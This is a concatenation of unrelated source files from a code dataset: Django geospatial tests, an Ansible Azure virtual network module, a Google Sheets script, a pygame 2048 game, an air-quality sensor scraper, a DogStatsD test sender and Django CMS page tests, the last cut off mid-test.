"type": "A/D - High/Very Slow Infiltration"
},
{
"area": 338,
"code": "bd",
"coverage": 0.0027264220953118444,
"type": "B/D - Medium/Very Slow Infiltration"
},
{
"area": 12737,
"code": "cd",
"coverage": 0.10274094150292001,
"type": "C/D - Medium/Very Slow Infiltration"
}
],
}
}
actual = tasks.analyze_soil(histogram)
self.assertEqual(actual, expected)
class ExerciseCatchmentIntersectsAOI(TestCase):
def test_sq_km_aoi(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-75.27900695800781,
39.891925022904516
],
[
-75.26608943939209,
39.891925022904516
],
[
-75.26608943939209,
39.90173657727282
],
[
-75.27900695800781,
39.90173657727282
],
[
-75.27900695800781,
39.891925022904516
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-75.28535842895508,
39.898279646242635
],
[
-75.27896404266357,
39.898279646242635
],
[
-75.27896404266357,
39.90305345750681
],
[
-75.28535842895508,
39.90305345750681
],
[
-75.28535842895508,
39.898279646242635
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-75.26849269866943,
39.890838422106924
],
[
-75.26244163513184,
39.890838422106924
],
[
-75.26244163513184,
39.89498716884207
],
[
-75.26849269866943,
39.89498716884207
],
[
-75.26849269866943,
39.890838422106924
]
]
]
}
contained_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-75.27368545532225,
39.89722607068418
],
[
-75.26887893676758,
39.89722607068418
],
[
-75.26887893676758,
39.90124274066003
],
[
-75.27368545532225,
39.90124274066003
],
[
-75.27368545532225,
39.89722607068418
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
contained_catchment))
def test_hundred_sq_km_aoi(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-94.64584350585938,
38.96154447940714
],
[
-94.53460693359374,
38.96154447940714
],
[
-94.53460693359374,
39.05225165582583
],
[
-94.64584350585938,
39.05225165582583
],
[
-94.64584350585938,
38.96154447940714
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-94.53563690185547,
39.03065255999985
],
[
-94.49203491210938,
39.03065255999985
],
[
-94.49203491210938,
39.07864158248181
],
[
-94.53563690185547,
39.07864158248181
],
[
-94.53563690185547,
39.03065255999985
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-94.55554962158203,
38.92870117926206
],
[
-94.49581146240233,
38.92870117926206
],
[
-94.49581146240233,
38.9858333874019
],
[
-94.55554962158203,
38.9858333874019
],
[
-94.55554962158203,
38.92870117926206
]
]
]
}
contained_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-94.62284088134766,
38.997841307500714
],
[
-94.58576202392578,
38.997841307500714
],
[
-94.58576202392578,
39.031452644263084
],
[
-94.62284088134766,
39.031452644263084
],
[
-94.62284088134766,
38.997841307500714
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
contained_catchment))
def test_thousand_sq_km_aoi(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-96.1083984375,
41.12074559016745
],
[
-95.7513427734375,
41.12074559016745
],
[
-95.7513427734375,
41.39741506646461
],
[
-96.1083984375,
41.39741506646461
],
[
-96.1083984375,
41.12074559016745
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-96.18255615234375,
41.24064190269475
],
[
-96.10736846923828,
41.24064190269475
],
[
-96.10736846923828,
41.2765163855178
],
[
-96.18255615234375,
41.2765163855178
],
[
-96.18255615234375,
41.24064190269475
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-95.8172607421875,
41.0607151401866
],
[
-95.68405151367188,
41.0607151401866
],
[
-95.68405151367188,
41.160046141686905
],
[
-95.8172607421875,
41.160046141686905
],
[
-95.8172607421875,
41.0607151401866
]
]
]
}
contained_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-95.93811035156249,
41.306697618181865
],
[
-95.82550048828125,
41.306697618181865
],
[
-95.82550048828125,
41.3757780692323
],
[
-95.93811035156249,
41.3757780692323
],
[
-95.93811035156249,
41.306697618181865
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
contained_catchment))
def test_ten_thousand_sq_km_aoi(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-115.01586914062499,
43.866218006556394
],
[
-113.719482421875,
43.866218006556394
],
[
-113.719482421875,
44.89479576469787
],
[
-115.01586914062499,
44.89479576469787
],
[
-115.01586914062499,
43.866218006556394
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-115.23559570312499,
44.380802793578475
],
[
-115.00488281250001,
44.380802793578475
],
[
-115.00488281250001,
44.52001001133986
],
[
-115.23559570312499,
44.52001001133986
],
[
-115.23559570312499,
44.380802793578475
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-115.17791748046875,
43.775060351224695
],
[
-114.949951171875,
43.775060351224695
],
[
-114.949951171875,
44.09350315285847
],
[
-115.17791748046875,
44.09350315285847
],
[
-115.17791748046875,
43.775060351224695
]
]
]
}
contained_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-114.43359375,
44.262904233655384
],
[
-114.06829833984375,
44.262904233655384
],
[
-114.06829833984375,
44.61393394730626
],
[
-114.43359375,
44.61393394730626
],
[
-114.43359375,
44.262904233655384
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
contained_catchment))
def test_huge_aoi_tiny_catchments(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-85.166015625,
39.470125122358176
],
[
-82.44140625,
39.470125122358176
],
[
-82.44140625,
42.94033923363181
],
[
-85.166015625,
42.94033923363181
],
[
-85.166015625,
39.470125122358176
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-85.440673828125,
42.68243539838623
],
[
-85.15502929687499,
42.68243539838623
],
[
-85.15502929687499,
42.79540065303723
],
[
-85.440673828125,
42.79540065303723
],
[
-85.440673828125,
42.68243539838623
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-82.63916015625,
41.94314874732696
],
[
-82.265625,
41.94314874732696
],
[
-82.265625,
42.06560675405716
],
[
-82.63916015625,
42.06560675405716
],
[
-82.63916015625,
41.94314874732696
]
]
]
}
contained_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-83.671875,
39.65645604812829
],
[
-83.34228515625,
39.65645604812829
],
[
-83.34228515625,
39.9434364619742
],
[
-83.671875,
39.9434364619742
],
[
-83.671875,
39.65645604812829
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
contained_catchment))
def test_huge_catchments_tiny_aoi(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-86.1189079284668,
30.712618489700507
],
[
-86.11066818237303,
30.712618489700507
],
[
-86.11066818237303,
30.719554693895116
],
[
-86.1189079284668,
30.719554693895116
],
[
-86.1189079284668,
30.712618489700507
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-86.11856460571288,
30.71940712027702
],
[
-86.12113952636719,
30.88395860861961
],
[
-86.38206481933594,
30.884547891921986
],
[
-86.37931823730467,
30.71586528568626
],
[
-86.11856460571288,
30.71940712027702
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-86.13006591796874,
30.59832078510471
],
[
-85.9075927734375,
30.59832078510471
],
[
-85.9075927734375,
30.714094319607913
],
[
-86.13006591796874,
30.714094319607913
],
[
-86.13006591796874,
30.59832078510471
]
]
]
}
containing_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-86.22550964355469,
30.627277165616874
],
[
-86.0394287109375,
30.627277165616874
],
[
-86.0394287109375,
30.80967992229391
],
[
-86.22550964355469,
30.80967992229391
],
[
-86.22550964355469,
30.627277165616874
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
containing_catchment))
| StarcoderdataPython |
3287707 | <gh_stars>0
#!/usr/bin/python
#
# Copyright (c) 2016 <NAME>, <<EMAIL>>
# <NAME>, <<EMAIL>>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_virtualnetwork_info
short_description: Get virtual network facts
description:
- Get facts for a specific virtual network or all virtual networks within a resource group.
options:
name:
description:
- Only show results for a specific security group.
resource_group:
description:
- Limit results by resource group. Required when filtering by name.
tags:
description:
- Limit results by providing a list of tags. Format tags as 'key' or 'key:value'.
extends_documentation_fragment:
- azure.azcollection.azure
author:
- <NAME> (@chouseknecht)
- <NAME> (@nitzmahone)
'''
EXAMPLES = '''
- name: Get facts for one virtual network
community.azure.azure_rm_virtualnetwork_info:
resource_group: myResourceGroup
name: secgroup001
- name: Get facts for all virtual networks
community.azure.azure_rm_virtualnetwork_info:
resource_group: myResourceGroup
- name: Get facts by tags
community.azure.azure_rm_virtualnetwork_info:
tags:
- testing
'''
RETURN = '''
azure_virtualnetworks:
description:
- List of virtual network dicts.
returned: always
type: list
example: [{
"etag": 'W/"532ba1be-ae71-40f2-9232-3b1d9cf5e37e"',
"id": "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroup/myResourceGroup/providers/Microsoft.Network/virtualNetworks/vnet2001",
"location": "eastus2",
"name": "vnet2001",
"properties": {
"addressSpace": {
"addressPrefixes": [
"10.10.0.0/16"
]
},
"provisioningState": "Succeeded",
"resourceGuid": "a7ba285f-f7e7-4e17-992a-de4d39f28612",
"subnets": []
},
"type": "Microsoft.Network/virtualNetworks"
}]
virtualnetworks:
description:
- List of virtual network dicts with same format as M(community.azure.azure_rm_virtualnetwork) module parameters.
returned: always
type: complex
contains:
id:
description:
- Resource ID of the virtual network.
sample: /subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/Microsoft.Network/virtualNetworks/vnet2001
returned: always
type: str
address_prefixes:
description:
- List of IPv4 address ranges where each is formatted using CIDR notation.
sample: ["10.10.0.0/16"]
returned: always
type: list
dns_servers:
description:
- Custom list of DNS servers.
returned: always
type: list
sample: ["www.azure.com"]
location:
description:
- Valid Azure location.
returned: always
type: str
sample: eastus
tags:
description:
- Tags assigned to the resource. Dictionary of string:string pairs.
returned: always
type: dict
sample: { "tag1": "abc" }
provisioning_state:
description:
- Provisioning state of the resource.
returned: always
sample: Succeeded
type: str
name:
description:
- Name of the virtual network.
returned: always
type: str
sample: foo
subnets:
description:
- Subnets associated with the virtual network.
returned: always
type: list
contains:
id:
description:
- Resource ID of the subnet.
returned: always
type: str
sample: "/subscriptions/f64d4ee8-be94-457d-ba26-3fa6b6506cef/resourceGroups/v-xisuRG/providers/
Microsoft.Network/virtualNetworks/vnetb57dc95232/subnets/vnetb57dc95232"
name:
description:
- Name of the subnet.
returned: always
type: str
sample: vnetb57dc95232
provisioning_state:
description:
- Provisioning state of the subnet.
returned: always
type: str
sample: Succeeded
address_prefix:
description:
- The address prefix for the subnet.
returned: always
type: str
sample: '10.1.0.0/16'
network_security_group:
description:
- Existing security group ID with which to associate the subnet.
returned: always
type: str
sample: null
route_table:
description:
- The reference of the RouteTable resource.
returned: always
type: str
sample: null
service_endpoints:
description:
- An array of service endpoints.
returned: always
type: list
sample: [
{
"locations": [
"southeastasia",
"eastasia"
],
"service": "Microsoft.Storage"
}
]
'''
try:
from msrestazure.azure_exceptions import CloudError
except Exception:
# This is handled in azure_rm_common
pass
from ansible_collections.azure.azcollection.plugins.module_utils.azure_rm_common import AzureRMModuleBase
AZURE_OBJECT_CLASS = 'VirtualNetwork'
class AzureRMNetworkInterfaceInfo(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
name=dict(type='str'),
resource_group=dict(type='str'),
tags=dict(type='list'),
)
self.results = dict(
changed=False,
virtualnetworks=[]
)
self.name = None
self.resource_group = None
self.tags = None
super(AzureRMNetworkInterfaceInfo, self).__init__(self.module_arg_spec,
supports_tags=False,
facts_module=True)
def exec_module(self, **kwargs):
is_old_facts = self.module._name == 'azure_rm_virtualnetwork_facts'
if is_old_facts:
self.module.deprecate("The 'azure_rm_virtualnetwork_facts' module has been renamed to 'azure_rm_virtualnetwork_info'", version='2.13')
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
if self.name is not None:
results = self.get_item()
elif self.resource_group is not None:
results = self.list_resource_group()
else:
results = self.list_items()
if is_old_facts:
self.results['ansible_facts'] = {
'azure_virtualnetworks': self.serialize(results)
}
self.results['virtualnetworks'] = self.curated(results)
return self.results
def get_item(self):
self.log('Get properties for {0}'.format(self.name))
item = None
results = []
try:
item = self.network_client.virtual_networks.get(self.resource_group, self.name)
except CloudError:
pass
if item and self.has_tags(item.tags, self.tags):
results = [item]
return results
def list_resource_group(self):
self.log('List items for resource group')
try:
response = self.network_client.virtual_networks.list(self.resource_group)
except CloudError as exc:
self.fail("Failed to list for resource group {0} - {1}".format(self.resource_group, str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(item)
return results
def list_items(self):
self.log('List all for items')
try:
response = self.network_client.virtual_networks.list_all()
except CloudError as exc:
self.fail("Failed to list all items - {0}".format(str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(item)
return results
def serialize(self, raws):
self.log("Serialize all items")
return [self.serialize_obj(item, AZURE_OBJECT_CLASS) for item in raws] if raws else []
def curated(self, raws):
self.log("Format all items")
return [self.virtualnetwork_to_dict(x) for x in raws] if raws else []
def virtualnetwork_to_dict(self, vnet):
results = dict(
id=vnet.id,
name=vnet.name,
location=vnet.location,
tags=vnet.tags,
provisioning_state=vnet.provisioning_state
)
if vnet.dhcp_options and len(vnet.dhcp_options.dns_servers) > 0:
results['dns_servers'] = []
for server in vnet.dhcp_options.dns_servers:
results['dns_servers'].append(server)
if vnet.address_space and len(vnet.address_space.address_prefixes) > 0:
results['address_prefixes'] = []
for space in vnet.address_space.address_prefixes:
results['address_prefixes'].append(space)
if vnet.subnets and len(vnet.subnets) > 0:
results['subnets'] = [self.subnet_to_dict(x) for x in vnet.subnets]
return results
def subnet_to_dict(self, subnet):
result = dict(
id=subnet.id,
name=subnet.name,
provisioning_state=subnet.provisioning_state,
address_prefix=subnet.address_prefix,
network_security_group=subnet.network_security_group.id if subnet.network_security_group else None,
route_table=subnet.route_table.id if subnet.route_table else None
)
if subnet.service_endpoints:
result['service_endpoints'] = [{'service': item.service, 'locations': item.locations} for item in subnet.service_endpoints]
return result
def main():
AzureRMNetworkInterfaceInfo()
if __name__ == '__main__':
main()
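# Hedged usage sketch (not part of the module itself): a playbook task along these
# lines could gather facts with this module. The resource group and vnet names are
# placeholders, not values taken from this file.
#
#   - name: Get facts for one virtual network
#     azure_rm_virtualnetwork_info:
#       resource_group: myResourceGroup
#       name: myVirtualNetwork
#     register: vnet_info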
| StarcoderdataPython |
182034 | <filename>get_gsheet.py
#!/usr/bin/env python3
from pprint import pprint
from pydoc import help
import pickle
import json
from google_auth_oauthlib import flow
from apiclient.discovery import build
AUTH_FILE = 'oauth2.json'
SCOPES = ["https://www.googleapis.com/auth/spreadsheets.readonly"]
SPREADSHEET_ID = '1wbnG31Z5QBm2fuyzZOY9XkSij0EERtX92wEHq9LbPiI'
URL = 'https://sheets.googleapis.com/v4/spreadsheets/' + SPREADSHEET_ID
SHEET_NAMES = ["Transactions", "Categories", "Balance History"]
def parse_google_auth(file):
"""
    parse_google_auth(file)
    :param file: String path (relative or absolute) to the OAuth client-secrets JSON file.
    This function requires a JSON file for a specific Google OAuth user,
    which can be downloaded from the Google Cloud Console for the linked project.
"""
try:
saved_token = open('token.bin', 'rb')
creds = pickle.load(saved_token)
    except (OSError, EOFError, pickle.UnpicklingError):
        # No usable cached token: run the OAuth flow and cache the new credentials.
saved_token = open('token.bin', 'wb+')
auth_flow = flow.InstalledAppFlow.from_client_secrets_file(file, scopes=SCOPES)
creds = auth_flow.run_local_server(open_browser=True)
pickle.dump(creds, saved_token)
finally:
saved_token.close()
service = build('sheets', 'v4', credentials=creds)
return service
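# Hedged note: the cached credentials above are reused as-is; if they can expire, a
# refresh step along these lines (standard google-auth API) could be added before
# building the service. Shown only as a sketch, not wired into the function above:
#
#   from google.auth.transport.requests import Request
#   if creds and creds.expired and creds.refresh_token:
#       creds.refresh(Request())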
def open_file(service, file_id, range_string):
    # Use the file_id argument rather than the module-level constant so the helper is reusable.
    request = service.spreadsheets().values().batchGet(spreadsheetId=file_id, ranges=range_string)
    response = request.execute()
    # Context manager ensures the JSON output file is flushed and closed.
    with open('{}.json'.format(range_string.lower()), 'w+') as savefile:
        json.dump(response, savefile, indent=4, separators=[',', ': '])
SERVICE = parse_google_auth(AUTH_FILE)
for range_string in SHEET_NAMES:
open_file(SERVICE, SPREADSHEET_ID, range_string)
| StarcoderdataPython |
165540 | <filename>main.py
import pygame as pg
import sys
import random
import math
import os
# init
pg.init()
pg.font.init()
# font
title_font = pg.font.SysFont('MalgunGothic', 96)
block_font1 = pg.font.SysFont('MalgunGothic', 72)
block_font2 = pg.font.SysFont('MalgunGothic', 55)
block_font3 = pg.font.SysFont('MalgunGothic', 32)
# clock
clock = pg.time.Clock()
# color
COLOR_YELLOW = pg.Color(255, 255, 0)
COLOR_WHITE = pg.Color(255, 255, 255)
COLOR_BLACK = pg.Color(0, 0, 0)
COLOR_BLOCK = [pg.Color(244, 203, 255), pg.Color(234, 193, 255), pg.Color(204, 153, 255), pg.Color(163, 112, 214),
pg.Color(102, 21, 153), pg.Color(51, 0, 102),
               # random.randint is inclusive, so the upper bound must be 255 to stay a valid colour value
               pg.Color(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),
               pg.Color(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),
               pg.Color(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),
               pg.Color(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),
               pg.Color(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),
               pg.Color(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))]
# block
block_location = [[102, 251, 401, 549], [202, 351, 501, 649]]
block_value = [[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]
# SCREEN
os.environ['SDL_VIDEO_WINDOW_POS'] = "{},{}".format(400, 50)
SCREEN = pg.display.set_mode((650, 750))
def block_make():
blank = False
for i in block_value:
for j in i:
if j == 0:
blank = True
if blank != True:
print("Fail")
pg.quit()
sys.exit()
a = random.randint(0, 3)
b = random.randint(0, 3)
while block_value[a][b] != 0:
a = random.randint(0, 3)
b = random.randint(0, 3)
block_value[a][b] = random.choice([2, 2, 2, 4])
def block_draw(value, location):
if value == 0:
return
block_surface = pg.Surface((130, 130))
block_rect = block_surface.fill(COLOR_BLOCK[int(math.log(value, 2) - 1)])
#block_rect = block_surface.fill(COLOR_BLOCK[6])
block_rect.center = (block_location[0][location[0]], block_location[1][location[1]])
if value < 99:
block_text_surface = block_font1.render("%d" % value, True, COLOR_BLACK)
elif value < 9999:
block_text_surface = block_font2.render("%d" % value, True, COLOR_BLACK)
else:
block_text_surface = block_font3.render("%d" % value, True, COLOR_BLACK)
block_text_rect = block_text_surface.get_rect()
block_text_rect.center = (block_location[0][location[0]], block_location[1][location[1]])
SCREEN.blit(block_surface, block_rect)
SCREEN.blit(block_text_surface, block_text_rect)
def block_down():
for i in range(4):
a = [0]
for j in range(4):
if block_value[j][i] != 0:
a.append(block_value[j][i])
block_value[j][i] = 0
a.reverse()
j = 0
while j < len(a) - 1:
if a[j] == a[j + 1]:
a[j + 1] = 0
a[j] = a[j] * 2
j += 1
j += 1
k = 0
for j in range(len(a) - 1):
if a[j] != 0:
block_value[3 - k][i] = a[j]
k += 1
def block_up():
for i in range(4):
a = []
for j in range(4):
if block_value[j][i] != 0:
a.append(block_value[j][i])
block_value[j][i] = 0
a.append(0)
j = 0
while j < len(a) - 1:
if a[j] == a[j + 1]:
a[j + 1] = 0
a[j] = a[j] * 2
j += 1
j += 1
k = 0
for j in range(len(a) - 1):
if a[j] != 0:
block_value[k][i] = a[j]
k += 1
def block_left():
for i in block_value:
a = []
for j in range(4):
if i[j] != 0:
a.append(i[j])
i[j] = 0
a.append(0)
j = 0
while j < len(a) - 1:
if a[j] == a[j + 1]:
a[j + 1] = 0
a[j] = a[j] * 2
j += 1
j += 1
k = 0
for j in range(len(a) - 1):
if a[j] != 0:
i[k] = a[j]
k += 1
def block_right():
for i in block_value:
a = [0]
for j in range(4):
if i[j] != 0:
a.append(i[j])
i[j] = 0
a.reverse()
j = 0
while j < len(a) - 1:
if a[j] == a[j + 1]:
a[j + 1] = 0
a[j] = a[j] * 2
j += 1
j += 1
k = 0
for j in range(len(a) - 1):
if a[j] != 0:
i[3 - k] = a[j]
k += 1
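# The four move functions above repeat the same collapse-and-merge logic and differ only
# in traversal direction. As an illustrative sketch (not called by the game code in this
# file), the shared part could be factored into one helper that merges a single line of
# four values toward index 0:
def merge_line(values):
    # Drop zeros, merge equal neighbours once, then pad back to length 4.
    compact = [v for v in values if v != 0]
    merged = []
    i = 0
    while i < len(compact):
        if i + 1 < len(compact) and compact[i] == compact[i + 1]:
            merged.append(compact[i] * 2)
            i += 2
        else:
            merged.append(compact[i])
            i += 1
    return merged + [0] * (4 - len(merged))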
# surface, rect
title_text_surface = title_font.render("2048", True, COLOR_WHITE)
title_text_rect = title_text_surface.get_rect()
title_text_rect.center = (100, 50)
# loop
start = True
while True:
if start:
block_make()
start = False
for event in pg.event.get():
if event.type == pg.QUIT:
pg.quit()
sys.exit()
if event.type == pg.KEYDOWN:
if pg.key.get_pressed()[pg.K_DOWN]:
block_down()
block_make()
if pg.key.get_pressed()[pg.K_UP]:
block_up()
block_make()
if pg.key.get_pressed()[pg.K_LEFT]:
block_left()
block_make()
if pg.key.get_pressed()[pg.K_RIGHT]:
block_right()
block_make()
SCREEN.fill(COLOR_BLACK)
for i in range(1, 4):
pg.draw.line(SCREEN, (100, 100, 100), [25 + 150 * i, 125], [25 + 150 * i, 725], 5)
pg.draw.line(SCREEN, (100, 100, 100), [25, 125 + 150 * i], [625, 125 + 150 * i], 5)
pg.draw.rect(SCREEN, COLOR_WHITE, [25, 125, 600, 600], 10)
SCREEN.blit(title_text_surface, title_text_rect)
y = 0
for i in block_value:
x = 0
for j in i:
block_draw(j, [x, y])
x += 1
y += 1
pg.display.flip()
clock.tick(30) | StarcoderdataPython |
159164 | #!/usr/bin/env python3
import json
from datetime import datetime, timedelta
import os
from functools import partial
import pathlib
import requests
import sys
import time
import threading
TOK_THINGSPEAK_PRIMARY_ID = "THINGSPEAK_PRIMARY_ID"
TOK_THINGSPEAK_PRIMARY_ID_READ_KEY = "THINGSPEAK_PRIMARY_ID_READ_KEY"
DATA_DIR = "./data-cache"
IN_BACKGROUND = True
GET_SLEEP = 0.1
MAX_THREADS=20
class Cache:
@staticmethod
def init():
pathlib.Path(DATA_DIR).mkdir(parents=True, exist_ok=True)
@staticmethod
def get(fname, func):
path = os.path.join(DATA_DIR, fname)
if os.path.exists(path):
print(f"{fname} previously cached")
with open(path, "r") as f:
return json.load(f)
print(f"{fname} not cached, calling {func}")
content = func()
if content:
with open(path, "w") as f:
print(f"Caching {fname}")
json.dump(content, f)
return content
@staticmethod
def clear(fname):
path = os.path.join(DATA_DIR, fname)
print(f"Removing {fname}")
os.unlink(path)
@staticmethod
def contains(fname):
path = os.path.join(DATA_DIR, fname)
return os.path.exists(path)
def getUrl(url):
res = requests.get(url)
time.sleep(GET_SLEEP)
return {
"status_code": res.status_code,
"headers": dict(res.headers),
"text": res.json()
}
def getSensorData(id, key=None):
print(f"Fetching sensor data for {id}")
url = f"https://www.purpleair.com/json?show={id}&key={key}"
return getUrl(url)
def getSensorTimeline(channel, api_key):
field = 2
now = datetime.now()
start = now - timedelta(days=7)
startStr = "{:%Y-%m-%d %H:%M:%S}".format(start)
endStr = ""
offset = 0
avg = 60
url = f"https://api.thingspeak.com/channels/{channel}/fields/{field}.json?start={startStr}&end={endStr}&offset={offset}&round=2&average={avg}&api_key={api_key}"
return getUrl(url)
Cache.init()
def handle_id(id):
fname_data = f"{id}.data"
print(f"{id}: Getting: {fname_data}")
data = Cache.get(fname_data, partial(getSensorData, id))
status = data["status_code"]
print(f"{id}: Status(data): {status}")
if status != 200:
print(f"{id}: ====================== Deleting {fname_data}")
Cache.clear(fname_data)
return
results = data["text"]["results"]
if len(results) == 0:
print(f"{id}: Skipping: empty")
return
if results[0].get("DEVICE_LOCATIONTYPE") == "inside":
print(f"{id}: Skipping: inside")
return
if results[0].get("ParentID"):
print(f"{id}: Skipping: has a parent")
return
fname_timeline = f"{id}.timeline"
channel = data["text"]["results"][0][TOK_THINGSPEAK_PRIMARY_ID]
api_key = data["text"]["results"][0][TOK_THINGSPEAK_PRIMARY_ID_READ_KEY]
timeline = Cache.get(fname_timeline, partial(getSensorTimeline, channel, api_key))
print(f"{id}: Status(timeline): {timeline['status_code']}")
status = timeline["status_code"]
if status != 200:
print(f"{id}: ====================== Deleting {fname_timeline}")
Cache.clear(fname_timeline)
assert MAX_THREADS >= 2
for id in range(1000, 83000):
if IN_BACKGROUND:
        while threading.active_count() >= MAX_THREADS:
time.sleep(0.01)
func = partial(handle_id, id)
threading.Thread(target=func).start()
else:
handle_id(id)
| StarcoderdataPython |
50482 | <filename>test/e2e/containers/dsd_sender/sender.py
import datadog
import time
client = datadog.dogstatsd.base.DogStatsd(socket_path="/var/run/dogstatsd/dsd.socket")
while True:
# Nominal case, dsd will inject its hostname
client.gauge('dsd.hostname.e2e', 1, tags=["case:nominal"])
client.service_check('dsd.hostname.e2e', 0, tags=["case:nominal"])
client.event('dsd.hostname.e2e', 'text', tags=["case:nominal"])
# Force the hostname value
client.gauge('dsd.hostname.e2e', 1, tags=["case:forced", "host:forced"])
client.service_check('dsd.hostname.e2e', 0, tags=["case:forced"], hostname="forced")
client.event('dsd.hostname.e2e', 'text', tags=["case:forced"], hostname="forced")
# Force an empty hostname
client.gauge('dsd.hostname.e2e', 1, tags=["case:empty", "host:"])
client.service_check('dsd.hostname.e2e', 0, tags=["case:empty", "host:"])
client.event('dsd.hostname.e2e', 'text', tags=["case:empty", "host:"])
time.sleep(10)
| StarcoderdataPython |
1731077 | <gh_stars>0
"""
Exercise:
Read strings from the terminal in a loop and stop when an empty string is entered.
After input stops, print all of the collected content (as a single string).
"""
result = []
while True:
content = input("请输入内容:")
if content == "":
break
result.append(content)
result = "_".join(result)
print(result)
| StarcoderdataPython |
95316 | import tictac.cli
tictac.cli.main()
| StarcoderdataPython |
3282737 | """
Test suite for all utils in the `core` application
"""
from django.test import override_settings
from cms.api import Page
from cms.test_utils.testcases import CMSTestCase
from richie.apps.core.factories import PageFactory
from richie.apps.core.helpers import create_i18n_page
class PagesTests(CMSTestCase):
"""Integration tests that actually render pages"""
def test_pages_i18n(self):
"""
Create an i18n page and check its rendering on the site
"""
content = {"fr": "Tableau de bord", "en": "Dashboard"}
create_i18n_page(
content,
is_homepage=True,
published=True,
template="richie/single_column.html",
)
# Get the root page in french...
root = Page.objects.get_home()
response = self.client.get(root.get_absolute_url("fr"))
self.assertEqual(200, response.status_code)
# ... and make sure the page menu is present in french on the page
self.assertIn(content["fr"], response.rendered_content)
# Get the root page in english...
response = self.client.get(root.get_absolute_url("en"))
self.assertEqual(200, response.status_code)
# ... and make sure the page menu is present in english on the page
self.assertIn(content["en"], response.rendered_content)
@override_settings(SENTRY_DSN="https://example.com/sentry/dsn")
@override_settings(RELEASE="9.8.7")
@override_settings(ENVIRONMENT="test_pages")
def test_page_includes_frontend_context(self):
"""
Create a page and make sure it includes the frontend context as included
in `base.html`.
⚠️ If this test fails, before fixing it, identify if this change has had
⚠️ an impact on frontend and update frontend accordingly.
"""
page = PageFactory(should_publish=True, template="richie/single_column.html")
response = self.client.get(page.get_public_url())
